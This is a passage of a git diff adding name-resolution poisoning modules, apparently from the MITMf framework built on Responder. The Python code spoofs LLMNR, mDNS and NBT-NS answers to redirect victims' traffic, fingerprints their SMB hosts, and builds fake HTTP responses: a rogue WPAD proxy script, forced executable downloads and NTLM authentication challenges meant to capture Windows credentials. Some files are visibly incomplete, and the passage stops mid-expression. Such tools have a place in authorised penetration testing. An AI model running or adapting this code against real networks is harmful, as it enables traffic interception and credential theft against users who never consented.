def calculate(self): + self.fields["IP"] = socket.inet_aton(OURIP) + self.fields["IPLen"] = struct.pack(">h",len(self.fields["IP"])) + self.fields["AnswerNameLen"] = struct.pack(">h",len(self.fields["AnswerName"]))[1] + self.fields["QuestionNameLen"] = struct.pack(">h",len(self.fields["QuestionName"]))[1] + +def Parse_LLMNR_Name(data): + NameLen = struct.unpack('>B',data[12])[0] + Name = data[13:13+NameLen] + return Name + +# LLMNR Server class. +class LLMNR(BaseRequestHandler): + + def handle(self): + + ResponderConfig = ConfigWatcher.getInstance().getConfig()['Responder'] + DontRespondTo = ResponderConfig['DontRespondTo'] + DontRespondToName = ResponderConfig['DontRespondToName'] + RespondTo = ResponderConfig['RespondTo'] + RespondToName = ResponderConfig['RespondToName'] + + data, soc = self.request + try: + if data[2:4] == "\x00\x00": + if Parse_IPV6_Addr(data): + Name = Parse_LLMNR_Name(data) + if args.analyze: + if args.finger: + try: + Finger = RunSmbFinger((self.client_address[0],445)) + mitmf_logger.warning("[LLMNRPoisoner] {} is looking for {} | OS: {} | Client Version: {}".format(self.client_address[0], Name,Finger[0],Finger[1])) + except Exception: + mitmf_logger.warning("[LLMNRPoisoner] {} is looking for {}".format(self.client_address[0], Name)) + else: + mitmf_logger.warning("[LLMNRPoisoner] {} is looking for {}".format(self.client_address[0], Name)) + + if DontRespondToSpecificHost(DontRespondTo): + if RespondToIPScope(DontRespondTo, self.client_address[0]): + return None + + if DontRespondToSpecificName(DontRespondToName) and DontRespondToNameScope(DontRespondToName.upper(), Name.upper()): + return None + + if RespondToSpecificHost(RespondTo): + if args.analyze == False: + if RespondToIPScope(RespondTo, self.client_address[0]): + if RespondToSpecificName(RespondToName) == False: + buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name) + buff.calculate() + for x in range(1): + soc.sendto(str(buff), self.client_address) + #mitmf_logger.info(Message) + mitmf_logger.warning("[LLMNRPoisoner] Poisoned answer sent to {} the requested name was : {}".format(self.client_address[0],Name)) + if args.finger: + try: + Finger = RunSmbFinger((self.client_address[0],445)) + #print '[LLMNRPoisoner] OsVersion is:%s'%(Finger[0]) + #print '[LLMNRPoisoner] ClientVersion is :%s'%(Finger[1]) + mitmf_logger.info('[LLMNRPoisoner] OsVersion is:{}'.format(Finger[0])) + mitmf_logger.info('[LLMNRPoisoner] ClientVersion is :{}'.format(Finger[1])) + except Exception: + mitmf_logger.info('[LLMNRPoisoner] Fingerprint failed for host: {}'.format(self.client_address[0])) + pass + + if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()): + buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name) + buff.calculate() + for x in range(1): + soc.sendto(str(buff), self.client_address) + mitmf_logger.warning("[LLMNRPoisoner] Poisoned answer sent to {} the requested name was : {}".format(self.client_address[0],Name)) + if args.finger: + try: + Finger = RunSmbFinger((self.client_address[0],445)) + #print '[LLMNRPoisoner] OsVersion is:%s'%(Finger[0]) + #print '[LLMNRPoisoner] ClientVersion is :%s'%(Finger[1]) + mitmf_logger.info('[LLMNRPoisoner] OsVersion is:{}'.format(Finger[0])) + mitmf_logger.info('[LLMNRPoisoner] ClientVersion is :{}'.format(Finger[1])) + except Exception: + mitmf_logger.info('[LLMNRPoisoner] Fingerprint failed for host: {}'.format(self.client_address[0])) + pass + + if args.analyze == False and RespondToSpecificHost(RespondTo) == False: + if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()): + buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name) + buff.calculate() + for x in range(1): + soc.sendto(str(buff), self.client_address) + mitmf_logger.warning("[LLMNRPoisoner] Poisoned answer sent to {} the requested name was : {}".format(self.client_address[0], Name)) + if args.finger: + try: + Finger = RunSmbFinger((self.client_address[0],445)) + #print '[LLMNRPoisoner] OsVersion is:%s'%(Finger[0]) + #print '[LLMNRPoisoner] ClientVersion is :%s'%(Finger[1]) + mitmf_logger.info('[LLMNRPoisoner] OsVersion is: {}'.format(Finger[0])) + mitmf_logger.info('[LLMNRPoisoner] ClientVersion is : {}'.format(Finger[1])) + except Exception: + mitmf_logger.info('[LLMNRPoisoner] Fingerprint failed for host: {}'.format(self.client_address[0])) + pass + if RespondToSpecificName(RespondToName) == False: + buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name) + buff.calculate() + for x in range(1): + soc.sendto(str(buff), self.client_address) + mitmf_logger.warning("[LLMNRPoisoner] Poisoned answer sent to {} the requested name was : {}".format(self.client_address[0], Name)) + if args.finger: + try: + Finger = RunSmbFinger((self.client_address[0],445)) + mitmf_logger.info('[LLMNRPoisoner] OsVersion is: {}'.format(Finger[0])) + mitmf_logger.info('[LLMNRPoisoner] ClientVersion is : {}'.format(Finger[1])) + except Exception: + mitmf_logger.info('[LLMNRPoisoner] Fingerprint failed for host: {}'.format(self.client_address[0])) + pass + else: + pass + else: + pass + except: + raise \ No newline at end of file diff --git a/core/responder/llmnr/__init__.py b/core/responder/llmnr/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/core/responder/mdns/MDNSPoisoner.py b/core/responder/mdns/MDNSPoisoner.py new file mode 100644 index 0000000..e8bbb77 --- /dev/null +++ b/core/responder/mdns/MDNSPoisoner.py @@ -0,0 +1,103 @@ +#! /usr/bin/env python2.7 + +from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler +import threading +import struct + +from core.protocols.odict import OrderedDict +from core.protocols.packet import Packet + +class MDNSPoisoner(): + + def start(): + try: + server = ThreadingUDPMDNSServer(("0.0.0.0", 5353), MDNS) + t = threading.Thread(name="MDNS", target=server.serve_forever) + t.setDaemon(True) + t.start() + except Exception, e: + print "Error starting MDNSPoisoner on port %s: %s:" % (str(port),str(e)) + +class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer): + + allow_reuse_address = 1 + + def server_bind(self): + MADDR = "224.0.0.251" + self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1) + self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255) + Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP,inet_aton(MADDR)+inet_aton(OURIP)) + + UDPServer.server_bind(self + +class MDNSAns(Packet): + fields = OrderedDict([ + ("Tid", "\x00\x00"), + ("Flags", "\x84\x00"), + ("Question", "\x00\x00"), + ("AnswerRRS", "\x00\x01"), + ("AuthorityRRS", "\x00\x00"), + ("AdditionalRRS", "\x00\x00"), + ("AnswerName", ""), + ("AnswerNameNull", "\x00"), + ("Type", "\x00\x01"), + ("Class", "\x00\x01"), + ("TTL", "\x00\x00\x00\x78"),##Poison for 2mn. + ("IPLen", "\x00\x04"), + ("IP", "\x00\x00\x00\x00"), + ]) + + def calculate(self): + self.fields["IP"] = inet_aton(OURIP) + self.fields["IPLen"] = struct.pack(">h",len(self.fields["IP"])) + +def Parse_MDNS_Name(data): + data = data[12:] + NameLen = struct.unpack('>B',data[0])[0] + Name = data[1:1+NameLen] + NameLen_ = struct.unpack('>B',data[1+NameLen])[0] + Name_ = data[1+NameLen:1+NameLen+NameLen_+1] + return Name+'.'+Name_ + +def Poisoned_MDNS_Name(data): + data = data[12:] + Name = data[:len(data)-5] + return Name + +class MDNS(BaseRequestHandler): + + def handle(self): + MADDR = "224.0.0.251" + MPORT = 5353 + data, soc = self.request + if self.client_address[0] == "127.0.0.1": + pass + try: + if AnalyzeMode: + if Parse_IPV6_Addr(data): + #print '[Analyze mode: MDNS] Host: %s is looking for : %s'%(self.client_address[0],Parse_MDNS_Name(data)) + responder_logger.info('[Analyze mode: MDNS] Host: %s is looking for : %s'%(self.client_address[0],Parse_MDNS_Name(data))) + + if RespondToSpecificHost(RespondTo): + if AnalyzeMode == False: + if RespondToIPScope(RespondTo, self.client_address[0]): + if Parse_IPV6_Addr(data): + #print 'MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data)) + responder_logger.info('MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data))) + Name = Poisoned_MDNS_Name(data) + MDns = MDNSAns(AnswerName = Name) + MDns.calculate() + soc.sendto(str(MDns),(MADDR,MPORT)) + + if AnalyzeMode == False and RespondToSpecificHost(RespondTo) == False: + if Parse_IPV6_Addr(data): + #print 'MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data)) + responder_logger.info('MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data))) + Name = Poisoned_MDNS_Name(data) + MDns = MDNSAns(AnswerName = Name) + MDns.calculate() + soc.sendto(str(MDns),(MADDR,MPORT)) + else: + pass + except Exception: + raise \ No newline at end of file diff --git a/core/responder/mdns/__init.py b/core/responder/mdns/__init.py new file mode 100644 index 0000000..e69de29 diff --git a/core/responder/nbtns/NBTNSPoisoner.py b/core/responder/nbtns/NBTNSPoisoner.py new file mode 100644 index 0000000..1d4c071 --- /dev/null +++ b/core/responder/nbtns/NBTNSPoisoner.py @@ -0,0 +1,208 @@ +#! /usr/bin/env python2.7 + +from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler +import threading +import struct + +from core.responder.packet import Packet + +class NBTNSPoisoner(): + + def start(): + server = ThreadingUDPServer(("0.0.0.0", 137), NB) + t = threading.Thread(name="NBNS", target=server.serve_forever()) #NBNS + t.setDaemon(True) + t.start() + +class ThreadingUDPServer(ThreadingMixIn, UDPServer): + + allow_reuse_address = 1 + + def server_bind(self): + UDPServer.server_bind(self) + +#NBT-NS answer packet. +class NBT_Ans(Packet): + fields = OrderedDict([ + ("Tid", ""), + ("Flags", "\x85\x00"), + ("Question", "\x00\x00"), + ("AnswerRRS", "\x00\x01"), + ("AuthorityRRS", "\x00\x00"), + ("AdditionalRRS", "\x00\x00"), + ("NbtName", ""), + ("Type", "\x00\x20"), + ("Classy", "\x00\x01"), + ("TTL", "\x00\x00\x00\xa5"), + ("Len", "\x00\x06"), + ("Flags1", "\x00\x00"), + ("IP", "\x00\x00\x00\x00"), + ]) + + def calculate(self,data): + self.fields["Tid"] = data[0:2] + self.fields["NbtName"] = data[12:46] + self.fields["IP"] = inet_aton(OURIP) + +def NBT_NS_Role(data): + Role = { + "\x41\x41\x00":"Workstation/Redirector Service.", + "\x42\x4c\x00":"Domain Master Browser. This name is likely a domain controller or a homegroup.)", + "\x42\x4d\x00":"Domain controller service. This name is a domain controller.", + "\x42\x4e\x00":"Local Master Browser.", + "\x42\x4f\x00":"Browser Election Service.", + "\x43\x41\x00":"File Server Service.", + "\x41\x42\x00":"Browser Service.", + } + + if data in Role: + return Role[data] + else: + return "Service not known." + +# Define what are we answering to. +def Validate_NBT_NS(data,Wredirect): + if AnalyzeMode: + return False + + if NBT_NS_Role(data[43:46]) == "File Server Service.": + return True + + if NBTNSDomain == True: + if NBT_NS_Role(data[43:46]) == "Domain controller service. This name is a domain controller.": + return True + + if Wredirect == True: + if NBT_NS_Role(data[43:46]) == "Workstation/Redirector Service.": + return True + + else: + return False + +def Decode_Name(nbname): + #From http://code.google.com/p/dpkt/ with author's permission. + try: + if len(nbname) != 32: + return nbname + l = [] + for i in range(0, 32, 2): + l.append(chr(((ord(nbname[i]) - 0x41) << 4) | + ((ord(nbname[i+1]) - 0x41) & 0xf))) + return filter(lambda x: x in string.printable, ''.join(l).split('\x00', 1)[0].replace(' ', '')) + except: + return "Illegal NetBIOS name" + +# NBT_NS Server class. +class NB(BaseRequestHandler): + + def handle(self): + data, socket = self.request + Name = Decode_Name(data[13:45]) + + if DontRespondToSpecificHost(DontRespondTo): + if RespondToIPScope(DontRespondTo, self.client_address[0]): + return None + + if DontRespondToSpecificName(DontRespondToName) and DontRespondToNameScope(DontRespondToName.upper(), Name.upper()): + return None + + if AnalyzeMode: + if data[2:4] == "\x01\x10": + if Is_Finger_On(Finger_On_Off): + try: + Finger = RunSmbFinger((self.client_address[0],445)) + Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s.\nOs Version is: %s Client Version is: %s"%(self.client_address[0], Name,NBT_NS_Role(data[43:46]),Finger[0],Finger[1]) + logger3.warning(Message) + except Exception: + Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s\n"%(self.client_address[0], Name,NBT_NS_Role(data[43:46])) + logger3.warning(Message) + else: + Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s"%(self.client_address[0], Name,NBT_NS_Role(data[43:46])) + logger3.warning(Message) + + if RespondToSpecificHost(RespondTo) and AnalyzeMode == False: + if RespondToIPScope(RespondTo, self.client_address[0]): + if data[2:4] == "\x01\x10": + if Validate_NBT_NS(data,Wredirect): + if RespondToSpecificName(RespondToName) == False: + buff = NBT_Ans() + buff.calculate(data) + for x in range(1): + socket.sendto(str(buff), self.client_address) + Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name) + #responder_logger.info(Message) + logger2.warning(Message) + if Is_Finger_On(Finger_On_Off): + try: + Finger = RunSmbFinger((self.client_address[0],445)) + #print '[+] OsVersion is:%s'%(Finger[0]) + #print '[+] ClientVersion is :%s'%(Finger[1]) + responder_logger.info('[+] OsVersion is:%s'%(Finger[0])) + responder_logger.info('[+] ClientVersion is :%s'%(Finger[1])) + except Exception: + responder_logger.info('[+] Fingerprint failed for host: %s'%(self.client_address[0])) + pass + if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()): + buff = NBT_Ans() + buff.calculate(data) + for x in range(1): + socket.sendto(str(buff), self.client_address) + Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name) + #responder_logger.info(Message) + logger2.warning(Message) + if Is_Finger_On(Finger_On_Off): + try: + Finger = RunSmbFinger((self.client_address[0],445)) + #print '[+] OsVersion is:%s'%(Finger[0]) + #print '[+] ClientVersion is :%s'%(Finger[1]) + responder_logger.info('[+] OsVersion is:%s'%(Finger[0])) + responder_logger.info('[+] ClientVersion is :%s'%(Finger[1])) + except Exception: + responder_logger.info('[+] Fingerprint failed for host: %s'%(self.client_address[0])) + pass + else: + pass + else: + pass + + else: + if data[2:4] == "\x01\x10": + if Validate_NBT_NS(data,Wredirect) and AnalyzeMode == False: + if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()): + buff = NBT_Ans() + buff.calculate(data) + for x in range(1): + socket.sendto(str(buff), self.client_address) + Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name) + #responder_logger.info(Message) + logger2.warning(Message) + if Is_Finger_On(Finger_On_Off): + try: + Finger = RunSmbFinger((self.client_address[0],445)) + #print '[+] OsVersion is:%s'%(Finger[0]) + #print '[+] ClientVersion is :%s'%(Finger[1]) + responder_logger.info('[+] OsVersion is:%s'%(Finger[0])) + responder_logger.info('[+] ClientVersion is :%s'%(Finger[1])) + except Exception: + responder_logger.info('[+] Fingerprint failed for host: %s'%(self.client_address[0])) + pass + if RespondToSpecificName(RespondToName) == False: + buff = NBT_Ans() + buff.calculate(data) + for x in range(1): + socket.sendto(str(buff), self.client_address) + Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name) + #responder_logger.info(Message) + logger2.warning(Message) + if Is_Finger_On(Finger_On_Off): + try: + Finger = RunSmbFinger((self.client_address[0],445)) + #print '[+] OsVersion is:%s'%(Finger[0]) + #print '[+] ClientVersion is :%s'%(Finger[1]) + responder_logger.info('[+] OsVersion is:%s'%(Finger[0])) + responder_logger.info('[+] ClientVersion is :%s'%(Finger[1])) + except Exception: + responder_logger.info('[+] Fingerprint failed for host: %s'%(self.client_address[0])) + pass + else: + pass \ No newline at end of file diff --git a/core/responder/nbtns/__init__.py b/core/responder/nbtns/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/core/responder/odict.py b/core/responder/odict.py new file mode 100644 index 0000000..89a9172 --- /dev/null +++ b/core/responder/odict.py @@ -0,0 +1,120 @@ +# NBT-NS/LLMNR Responder +# Created by Laurent Gaffie +# Copyright (C) 2014 Trustwave Holdings, Inc. +# +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program. If not, see . + + +#Packet class handling all packet generation (see odict.py). +from UserDict import DictMixin + +class OrderedDict(dict, DictMixin): + + def __init__(self, *args, **kwds): + if len(args) > 1: + raise TypeError('expected at most 1 arguments, got %d' % len(args)) + try: + self.__end + except AttributeError: + self.clear() + self.update(*args, **kwds) + + def clear(self): + self.__end = end = [] + end += [None, end, end] + self.__map = {} + dict.clear(self) + + def __setitem__(self, key, value): + if key not in self: + end = self.__end + curr = end[1] + curr[2] = end[1] = self.__map[key] = [key, curr, end] + dict.__setitem__(self, key, value) + + def __delitem__(self, key): + dict.__delitem__(self, key) + key, prev, next = self.__map.pop(key) + prev[2] = next + next[1] = prev + + def __iter__(self): + end = self.__end + curr = end[2] + while curr is not end: + yield curr[0] + curr = curr[2] + + def __reversed__(self): + end = self.__end + curr = end[1] + while curr is not end: + yield curr[0] + curr = curr[1] + + def popitem(self, last=True): + if not self: + raise KeyError('dictionary is empty') + if last: + key = reversed(self).next() + else: + key = iter(self).next() + value = self.pop(key) + return key, value + + def __reduce__(self): + items = [[k, self[k]] for k in self] + tmp = self.__map, self.__end + del self.__map, self.__end + inst_dict = vars(self).copy() + self.__map, self.__end = tmp + if inst_dict: + return (self.__class__, (items,), inst_dict) + return self.__class__, (items,) + + def keys(self): + return list(self) + + setdefault = DictMixin.setdefault + update = DictMixin.update + pop = DictMixin.pop + values = DictMixin.values + items = DictMixin.items + iterkeys = DictMixin.iterkeys + itervalues = DictMixin.itervalues + iteritems = DictMixin.iteritems + + def __repr__(self): + if not self: + return '%s()' % (self.__class__.__name__,) + return '%s(%r)' % (self.__class__.__name__, self.items()) + + def copy(self): + return self.__class__(self) + + @classmethod + def fromkeys(cls, iterable, value=None): + d = cls() + for key in iterable: + d[key] = value + return d + + def __eq__(self, other): + if isinstance(other, OrderedDict): + return len(self)==len(other) and \ + min(p==q for p, q in zip(self.items(), other.items())) + return dict.__eq__(self, other) + + def __ne__(self, other): + return not self == other diff --git a/core/responder/packet.py b/core/responder/packet.py new file mode 100644 index 0000000..ffdf157 --- /dev/null +++ b/core/responder/packet.py @@ -0,0 +1,34 @@ +# NBT-NS/LLMNR Responder +# Created by Laurent Gaffie +# Copyright (C) 2014 Trustwave Holdings, Inc. +# +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program. If not, see . + + +#Packet class handling all packet generation (see odict.py). +from odict import OrderedDict + +class Packet(): + fields = OrderedDict([ + ("data", ""), + ]) + def __init__(self, **kw): + self.fields = OrderedDict(self.__class__.fields) + for k,v in kw.items(): + if callable(v): + self.fields[k] = v(self.fields[k]) + else: + self.fields[k] = v + def __str__(self): + return "".join(map(str, self.fields.values())) diff --git a/core/responder/wpad/HTTPPackets.py b/core/responder/wpad/HTTPPackets.py new file mode 100644 index 0000000..92fe6ce --- /dev/null +++ b/core/responder/wpad/HTTPPackets.py @@ -0,0 +1,275 @@ +#! /usr/bin/env python +# NBT-NS/LLMNR Responder +# Created by Laurent Gaffie +# Copyright (C) 2014 Trustwave Holdings, Inc. +# +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program. If not, see . + +import struct + +from core.responder.packet import Packet +from core.responder.odict import OrderedDict +from base64 import b64decode,b64encode + +#WPAD script. the wpadwpadwpad is shorter than 15 chars and unlikely to be found. +class WPADScript(Packet): + fields = OrderedDict([ + ("Code", "HTTP/1.1 200 OK\r\n"), + ("ServerType", "Server: Microsoft-IIS/6.0\r\n"), + ("Date", "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"), + ("Type", "Content-Type: application/x-ns-proxy-autoconfig\r\n"), + ("PoweredBy", "X-Powered-By: ASP.NET\r\n"), + ("ContentLen", "Content-Length: "), + ("ActualLen", "76"), + ("CRLF", "\r\n\r\n"), + ("Payload", "function FindProxyForURL(url, host){return 'PROXY wpadwpadwpad:3141; DIRECT';}"), + ]) + def calculate(self): + self.fields["ActualLen"] = len(str(self.fields["Payload"])) + +class ServerExeFile(Packet): + fields = OrderedDict([ + ("Code", "HTTP/1.1 200 OK\r\n"), + ("ContentType", "Content-Type: application/octet-stream\r\n"), + ("LastModified", "Last-Modified: Wed, 24 Nov 2010 00:39:06 GMT\r\n"), + ("AcceptRanges", "Accept-Ranges: bytes\r\n"), + ("Server", "Server: Microsoft-IIS/7.5\r\n"), + ("PoweredBy", "X-Powered-By: ASP.NET\r\n"), + ("ContentLen", "Content-Length: "), + ("ActualLen", "76"), + ("Date", "\r\nDate: Thu, 24 Oct 2013 22:35:46 GMT\r\n"), + ("Connection", "Connection: keep-alive\r\n"), + ("X-CCC", "US\r\n"), + ("X-CID", "2\r\n"), + ("CRLF", "\r\n"), + ("Payload", "jj"), + ]) + def calculate(self): + self.fields["ActualLen"] = len(str(self.fields["Payload"])) + +class ServeAlwaysExeFile(Packet): + fields = OrderedDict([ + ("Code", "HTTP/1.1 200 OK\r\n"), + ("ContentType", "Content-Type: application/octet-stream\r\n"), + ("LastModified", "Last-Modified: Wed, 24 Nov 2010 00:39:06 GMT\r\n"), + ("AcceptRanges", "Accept-Ranges: bytes\r\n"), + ("Server", "Server: Microsoft-IIS/7.5\r\n"), + ("PoweredBy", "X-Powered-By: ASP.NET\r\n"), + ("ContentDisp", "Content-Disposition: attachment; filename="), + ("ContentDiFile", ""), + ("FileCRLF", ";\r\n"), + ("ContentLen", "Content-Length: "), + ("ActualLen", "76"), + ("Date", "\r\nDate: Thu, 24 Oct 2013 22:35:46 GMT\r\n"), + ("Connection", "Connection: keep-alive\r\n"), + ("X-CCC", "US\r\n"), + ("X-CID", "2\r\n"), + ("CRLF", "\r\n"), + ("Payload", "jj"), + ]) + def calculate(self): + self.fields["ActualLen"] = len(str(self.fields["Payload"])) + +class ServeAlwaysNormalFile(Packet): + fields = OrderedDict([ + ("Code", "HTTP/1.1 200 OK\r\n"), + ("ContentType", "Content-Type: text/html\r\n"), + ("LastModified", "Last-Modified: Wed, 24 Nov 2010 00:39:06 GMT\r\n"), + ("AcceptRanges", "Accept-Ranges: bytes\r\n"), + ("Server", "Server: Microsoft-IIS/7.5\r\n"), + ("PoweredBy", "X-Powered-By: ASP.NET\r\n"), + ("ContentLen", "Content-Length: "), + ("ActualLen", "76"), + ("Date", "\r\nDate: Thu, 24 Oct 2013 22:35:46 GMT\r\n"), + ("Connection", "Connection: keep-alive\r\n"), + ("X-CCC", "US\r\n"), + ("X-CID", "2\r\n"), + ("CRLF", "\r\n"), + ("Payload", "jj"), + ]) + def calculate(self): + self.fields["ActualLen"] = len(str(self.fields["Payload"])) + +#HTTP Packet used for further NTLM auth. +class IIS_Auth_407_Ans(Packet): + fields = OrderedDict([ + ("Code", "HTTP/1.1 407 Authentication Required\r\n"), + ("Via", "Via: 1.1 SMB-TOOLKIT\r\n"), + ("Date", "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"), + ("Type", "Content-Type: text/html\r\n"), + ("WWW-Auth", "Proxy-Authenticate: NTLM\r\n"), + ("Connection", "Connection: close \r\n"), + ("PConnection", "proxy-Connection: close \r\n"), + ("Len", "Content-Length: 0\r\n"), + ("CRLF", "\r\n"), + ]) + +#HTTP NTLM packet. +class IIS_407_NTLM_Challenge_Ans(Packet): + fields = OrderedDict([ + ("Code", "HTTP/1.1 407 Authentication Required\r\n"), + ("Via", "Via: 1.1 SMB-TOOLKIT\r\n"), + ("Date", "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"), + ("Type", "Content-Type: text/html\r\n"), + ("WWWAuth", "Proxy-Authenticate: NTLM "), + ("Payload", ""), + ("Payload-CRLF", "\r\n"), + ("PoweredBy", "X-Powered-By: SMB-TOOLKIT\r\n"), + ("Len", "Content-Length: 0\r\n"), + ("CRLF", "\r\n"), + ]) + + def calculate(self,payload): + self.fields["Payload"] = b64encode(payload) + +#HTTP Basic answer packet. +class IIS_Basic_407_Ans(Packet): + fields = OrderedDict([ + ("Code", "HTTP/1.1 407 Unauthorized\r\n"), + ("ServerType", "Server: Microsoft-IIS/6.0\r\n"), + ("Date", "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"), + ("Type", "Content-Type: text/html\r\n"), + ("WWW-Auth", "Proxy-Authenticate: Basic realm=\"ISAServer\"\r\n"), + ("PoweredBy", "X-Powered-By: ASP.NET\r\n"), + ("Len", "Content-Length: 0\r\n"), + ("CRLF", "\r\n"), + ]) + +#HTTP Packet used for further NTLM auth. +class IIS_Auth_401_Ans(Packet): + fields = OrderedDict([ + ("Code", "HTTP/1.1 401 Unauthorized\r\n"), + ("ServerType", "Server: Microsoft-IIS/6.0\r\n"), + ("Date", "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"), + ("Type", "Content-Type: text/html\r\n"), + ("WWW-Auth", "WWW-Authenticate: NTLM\r\n"), + ("PoweredBy", "X-Powered-By: ASP.NET\r\n"), + ("Len", "Content-Length: 0\r\n"), + ("CRLF", "\r\n"), + ]) + +#HTTP Packet Granted auth. +class IIS_Auth_Granted(Packet): + fields = OrderedDict([ + ("Code", "HTTP/1.1 200 OK\r\n"), + ("ServerType", "Server: Microsoft-IIS/6.0\r\n"), + ("Date", "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"), + ("Type", "Content-Type: text/html\r\n"), + ("WWW-Auth", "WWW-Authenticate: NTLM\r\n"), + ("PoweredBy", "X-Powered-By: ASP.NET\r\n"), + ("ContentLen", "Content-Length: "), + ("ActualLen", "76"), + ("CRLF", "\r\n\r\n"), + ("Payload", "\n\n\n\nLoading\n\n\n"), + ]) + def calculate(self): + self.fields["ActualLen"] = len(str(self.fields["Payload"])) + +#HTTP NTLM Auth +class NTLM_Challenge(Packet): + fields = OrderedDict([ + ("Signature", "NTLMSSP"), + ("SignatureNull", "\x00"), + ("MessageType", "\x02\x00\x00\x00"), + ("TargetNameLen", "\x06\x00"), + ("TargetNameMaxLen", "\x06\x00"), + ("TargetNameOffset", "\x38\x00\x00\x00"), + ("NegoFlags", "\x05\x02\x89\xa2"), + ("ServerChallenge", ""), + ("Reserved", "\x00\x00\x00\x00\x00\x00\x00\x00"), + ("TargetInfoLen", "\x7e\x00"), + ("TargetInfoMaxLen", "\x7e\x00"), + ("TargetInfoOffset", "\x3e\x00\x00\x00"), + ("NTLMOsVersion", "\x05\x02\xce\x0e\x00\x00\x00\x0f"), + ("TargetNameStr", "SMB"), + ("Av1", "\x02\x00"),#nbt name + ("Av1Len", "\x06\x00"), + ("Av1Str", "SMB"), + ("Av2", "\x01\x00"),#Server name + ("Av2Len", "\x14\x00"), + ("Av2Str", "SMB-TOOLKIT"), + ("Av3", "\x04\x00"),#Full Domain name + ("Av3Len", "\x12\x00"), + ("Av3Str", "smb.local"), + ("Av4", "\x03\x00"),#Full machine domain name + ("Av4Len", "\x28\x00"), + ("Av4Str", "server2003.smb.local"), + ("Av5", "\x05\x00"),#Domain Forest Name + ("Av5Len", "\x12\x00"), + ("Av5Str", "smb.local"), + ("Av6", "\x00\x00"),#AvPairs Terminator + ("Av6Len", "\x00\x00"), + ]) + + def calculate(self): + ##First convert to uni + self.fields["TargetNameStr"] = self.fields["TargetNameStr"].encode('utf-16le') + self.fields["Av1Str"] = self.fields["Av1Str"].encode('utf-16le') + self.fields["Av2Str"] = self.fields["Av2Str"].encode('utf-16le') + self.fields["Av3Str"] = self.fields["Av3Str"].encode('utf-16le') + self.fields["Av4Str"] = self.fields["Av4Str"].encode('utf-16le') + self.fields["Av5Str"] = self.fields["Av5Str"].encode('utf-16le') + + ##Then calculate + CalculateNameOffset = str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str(self.fields["ServerChallenge"])+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"]) + + CalculateAvPairsOffset = CalculateNameOffset+str(self.fields["TargetNameStr"]) + + CalculateAvPairsLen = 